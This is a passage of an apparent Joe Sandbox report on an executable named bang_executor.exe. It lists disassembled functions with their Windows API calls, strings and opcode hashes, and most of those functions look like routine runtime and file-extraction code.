                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 0f41cfa5ab3e1588f46e0b341e76fb8064c5f73eb8c6da790434e9958abdda59
                                        • Instruction ID: 7872702aa6c8fc1abf6672f654df3cbec8a687f343271e7c631768c5fe08f8fd
                                        • Opcode Fuzzy Hash: 0f41cfa5ab3e1588f46e0b341e76fb8064c5f73eb8c6da790434e9958abdda59
                                        • Instruction Fuzzy Hash: BF01D136349A02BBE216A7785DCAAAE2E6EFFD13B17250424F509D21D1EB618C066120
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F2FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004F32AF: ResetEvent.KERNEL32(?), ref: 004F32C1
                                          • Part of subcall function 004F32AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004F32D5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000,08ADEBCE,?,?,00000001,?,005152FF,000000FF,?,004F43C0,?,00000000,?,004E4766), ref: 004F3007
                                        • CloseHandle.KERNEL32(?,?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001), ref: 004F3021
                                        • DeleteCriticalSection.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F303A
                                        • CloseHandle.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F3046
                                        • CloseHandle.KERNEL32(?,?,004F43C0,?,00000000,?,004E4766,?,?,?,00000000,?,?,?,00000001,?), ref: 004F3052
                                          • Part of subcall function 004F30CA: WaitForSingleObject.KERNEL32(?,000000FF,004F31E7,?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30D0
                                          • Part of subcall function 004F30CA: GetLastError.KERNEL32(?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: 859b46f3cd82e698fadc5897a46b835c84eac9454b9fdff8a843b0546c0f6357
                                        • Instruction ID: c087660fe49aba48abceafeaa0ca6d9d01c81a0323cf2f3c5a093b9d25585b01
                                        • Opcode Fuzzy Hash: 859b46f3cd82e698fadc5897a46b835c84eac9454b9fdff8a843b0546c0f6357
                                        • Instruction Fuzzy Hash: 0311A176400744EFC7229F64DC88FD6BBA9FB18711F01492AF26A92160CB75AA489B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0050EE67
                                          • Part of subcall function 0050BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?), ref: 0050BB10
                                          • Part of subcall function 0050BAFA: GetLastError.KERNEL32(?,?,0050EEE6,?,00000000,?,00000000,?,0050EF0D,?,00000007,?,?,0050F30A,?,?), ref: 0050BB22
                                        • _free.LIBCMT ref: 0050EE79
                                        • _free.LIBCMT ref: 0050EE8B
                                        • _free.LIBCMT ref: 0050EE9D
                                        • _free.LIBCMT ref: 0050EEAF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 910f8c24e62e36990d87c2ebb0289955bb195d4deb6a0d6890ab79bb5b6ca7e2
                                        • Instruction ID: a99dd1db8192acca69a5530468e24a0ba54ec733ad005951769b82bb5e945f65
                                        • Opcode Fuzzy Hash: 910f8c24e62e36990d87c2ebb0289955bb195d4deb6a0d6890ab79bb5b6ca7e2
                                        • Instruction Fuzzy Hash: 4BF0EC32604205AFD664EBA9E9C7C9E7BEEBF51710B650C05F44DD7580CB70FC849A50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FC79C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FC629: GetDC.USER32(00000000), ref: 004FC62D
                                          • Part of subcall function 004FC629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004FC638
                                          • Part of subcall function 004FC629: ReleaseDC.USER32(00000000,00000000), ref: 004FC643
                                        • GetObjectW.GDI32(?,00000018,?), ref: 004FC7E0
                                          • Part of subcall function 004FCA67: GetDC.USER32(00000000), ref: 004FCA70
                                          • Part of subcall function 004FCA67: GetObjectW.GDI32(?,00000018,?), ref: 004FCA9F
                                          • Part of subcall function 004FCA67: ReleaseDC.USER32(00000000,?), ref: 004FCB37
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ($fP
                                        • API String ID: 1061551593-3307054429
                                        • Opcode ID: ea70640e8b99e491fed9ee3de3355233e166bb654d467b05a4cf0b11ea87e268
                                        • Instruction ID: ddbb488d5fc21a97ed0f618a45275473def3ad59d7c9dfa32ca63439cb6ce728
                                        • Opcode Fuzzy Hash: ea70640e8b99e491fed9ee3de3355233e166bb654d467b05a4cf0b11ea87e268
                                        • Instruction Fuzzy Hash: 5F91F2756083589FD610DF29C884E6BBBE8FFD9B04F00491EF59AD3260CB74A905CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F3748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: 3f3a25aa46b1a8ee9dc90056fd572c8a4cfbd00b91ccfe336c21be01f150571c
                                        • Instruction ID: f50a271fe1ab617bd189d44738c8342f9af4aff9e9f85e2f4bfa6baa93337410
                                        • Opcode Fuzzy Hash: 3f3a25aa46b1a8ee9dc90056fd572c8a4cfbd00b91ccfe336c21be01f150571c
                                        • Instruction Fuzzy Hash: 295149F564830CFAF6207F958D42F767AE5AB09F06F20840BB386640D1C6ED9741AA1F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\bang_executor.exe,00000104), ref: 0050A800
                                        • _free.LIBCMT ref: 0050A8CB
                                        • _free.LIBCMT ref: 0050A8D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\bang_executor.exe
                                        • API String ID: 2506810119-1757287928
                                        • Opcode ID: 49c391ed75dcfb56fe71499a933155e880a9f672b6567b948d1d9aa0c26a4086
                                        • Instruction ID: a3412d4cc3f9b507f8ad46ac1704159696a73931b030c8c08e3e9201db1a68a8
                                        • Opcode Fuzzy Hash: 49c391ed75dcfb56fe71499a933155e880a9f672b6567b948d1d9aa0c26a4086
                                        • Instruction Fuzzy Hash: 95319D71A00319EFEB21DF99D885ADEBFFCFF95314B108066E90497281D6704E45DBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005057F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0050581B
                                        • _abort.LIBCMT ref: 00505926
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: 514a8ff19b02d9074e42918e1de2a95e2f440ecf6cc11d4f71ea3ffcf331a4a1
                                        • Instruction ID: 8c409e06988177979222587ea7d1d18b76cf8c9e726278b545e004f008ca96fd
                                        • Opcode Fuzzy Hash: 514a8ff19b02d9074e42918e1de2a95e2f440ecf6cc11d4f71ea3ffcf331a4a1
                                        • Instruction Fuzzy Hash: 5541277290060AEFCF15DF94CC85AAEBFB5FF48314F288599F904A6291E3359950DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EF7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 004EF82D
                                        • _strncpy.LIBCMT ref: 004EF871
                                          • Part of subcall function 004F3F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,004EF801,00000000,00000000,?,00525070,?,004EF801,?,?,00000050,?), ref: 004F3F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: 935cfa916ee79d3475b8c8ae2e2a79b783cdb77bb6896725570fd2dccca5f6ba
                                        • Instruction ID: 69016e93b90537870377250be424cf253e35a5ec3492f72053ed7f662ccd950f
                                        • Opcode Fuzzy Hash: 935cfa916ee79d3475b8c8ae2e2a79b783cdb77bb6896725570fd2dccca5f6ba
                                        • Instruction Fuzzy Hash: 7A21A172900349ABEB20EFA5CC05BBF77A8BF15300F44052BF91192291E775E9098B59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCDA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • EndDialog.USER32(?,00000001), ref: 004FCE28
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004FCE3D
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 004FCE52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: f4c451c1979091ea8fe609c263042535a68bf8b0304108829f19ee16f853abfd
                                        • Instruction ID: eb78dd94aae56fdc66e068e3eb90dc0ef404bdc67f9b65a83f5858f3106f56d1
                                        • Opcode Fuzzy Hash: f4c451c1979091ea8fe609c263042535a68bf8b0304108829f19ee16f853abfd
                                        • Instruction Fuzzy Hash: 9B11E43664020CAFD2219F69DE88FBB3B69FB5BB04F000406F301A71A5C7695909D7A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004F2F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F61
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F6B
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004ECAA0,00000008,00000004,004EF1F0,?,00000000), ref: 004F2F7B
                                        Strings
                                        • Thread pool initialization failed., xrefs: 004F2F93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: c930e6dfd1b518671c463a2b23daaaba230e3b3a6d4550d6340c84a6ea20d8d9
                                        • Instruction ID: 2ad21e5c22e3f5fb9b045ebd786b83ee65a5f71b48307d65c25a6ecfd91aa6c9
                                        • Opcode Fuzzy Hash: c930e6dfd1b518671c463a2b23daaaba230e3b3a6d4550d6340c84a6ea20d8d9
                                        • Instruction Fuzzy Hash: C81182B1604709AFC3215F6A9D849A7FBECFB59354F10482FF1DA82200D6B559409B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005000EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: efee656b113bf762365e56a459de5af75ab5a5cf9956c80ea6460b1f23955033
                                        • Instruction ID: 49562fb92eb28ecb73281790de04a9739dfa47976f0c27ee282e42b7f600d07a
                                        • Opcode Fuzzy Hash: efee656b113bf762365e56a459de5af75ab5a5cf9956c80ea6460b1f23955033
                                        • Instruction Fuzzy Hash: B4019E75608108AFDB219F24EC48BBB7FB4BF2A795F140425F905922B0D7318859EBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E4B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 004E4B42
                                          • Part of subcall function 0050106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00501079
                                          • Part of subcall function 0050106D: ___delayLoadHelper2@8.DELAYIMP ref: 0050109F
                                        • std::_Xinvalid_argument.LIBCPMT ref: 004E4B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                        • String ID: string too long$vector too long
                                        • API String ID: 2355824318-1617939282
                                        • Opcode ID: 6ce201a05c93a4e193ad6175ba1cb7695a9a2a251eb14b3c38b6717801fbde24
                                        • Instruction ID: 87a98eb13f35e9ef9c5ab461a052b260d177784bea351853f2eb84744e0bf25b
                                        • Opcode Fuzzy Hash: 6ce201a05c93a4e193ad6175ba1cb7695a9a2a251eb14b3c38b6717801fbde24
                                        • Instruction Fuzzy Hash: 44F082213007446B86346F9ADC4984AB7ADFBC5B21710091AEA85C3601C3B0F94487B9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EC142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,004E9343,?,?,?), ref: 004EC1EE
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,004E9343,?,?), ref: 004EC22C
                                        • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,004E9343,?,?,?,?,?,?,?,?), ref: 004EC2AF
                                        • CloseHandle.KERNEL32(00000800,?,?,?,004E9343,?,?,?,?,?,?,?,?,?,?), ref: 004EC2B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: fb568db82731a0c68acc29e66b14795b21857ff3a0635244757e0081f77a1cad
                                        • Instruction ID: 3249d591ac6984158f0f27783610f466da6156a65ba7aa818000e0ea0d3f45a9
                                        • Opcode Fuzzy Hash: fb568db82731a0c68acc29e66b14795b21857ff3a0635244757e0081f77a1cad
                                        • Instruction Fuzzy Hash: A14115306483819EE320DF65CC85FABBBE8AF89705F04091EB1D2D72C1C668DA0D8B56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004EBD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004EBD93
